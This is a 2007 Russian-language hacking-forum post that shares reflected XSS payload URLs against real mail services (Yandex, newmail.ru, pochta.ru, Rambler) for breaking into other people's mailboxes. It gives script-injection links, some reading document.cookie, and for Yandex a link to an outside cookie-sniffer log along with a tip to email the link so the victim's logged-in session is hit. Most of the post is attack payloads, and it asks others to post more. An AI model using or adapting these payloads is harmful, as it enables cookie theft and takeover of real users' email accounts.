Ломаем мыло с помощью Xss

Discussion in 'Уязвимости Mail-сервисов' started by Фанера, 14 May 2007.

  1. Фанера

    Фанера New Member

    Joined:
    12 May 2007
    Messages:
    3
    Likes Received:
    4
    Reputations:
    4
    Вот решил выложить пару xss ок ..ведь мыльце ими ламать намного проще чем скажем брутом

    yandex.ru...............................

    http://narod.yandex.ru/community/photo/36/139236.jpg
    логи снифа http://ww3.h17.ru/log.php

    (отправляем ссылку по почте ..так как на яндэксе система авторизаци стоит"неузнавать" а в почте он авторизован)

    www.newmail.ru........................

    Code:
    http://www.newmail.ru/users/reg.dhtml?__post=1&login="><script>alert()</script>&domain=newmail.ru&passwd=%22%3E%3Cscript%3Ealert%28&pass2=%22%3E%3Cscript%3Ealert%28&quest_helper=%C4%E5%E2%E8%F7%FC%FF+%F4%E0%EC%E8%EB%E8%FF+%EC%E0%F2%E5%F0%E8%3F&quest=%C4%E5%E2%E8%F7%FC%FF+%F4%E0%EC%E8%EB%E8%FF+%EC%E0%F2%E5%F0%E8%3F&answ=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscrip
    http://www.pochta.ru...............................

    Code:
    http://www.pochta.ru/regform.php?id=23alic3421uajcat5996psrs82&lng=ru&rnd=761200858&rid=hosting&reg_login="><script>alert()</script>&domain=pochta.ru

    rambler.ru..............................

    Code:
    http://robot.rambler.ru/cgi-bin/addsite.cgi?keywords=&title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&url=http%3A%2F%2Fwww.rambler.ru%2Findex.html&comments=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&contact=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&[email protected]%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
    на майл ру нескажу так как быстро закрывают то что в паблике..отписывайте кто есчо что нашёл на раскрученных почтовых сервисах
     
    #1 Фанера, 14 May 2007
    Last edited by a moderator: 14 May 2007
    3 people like this.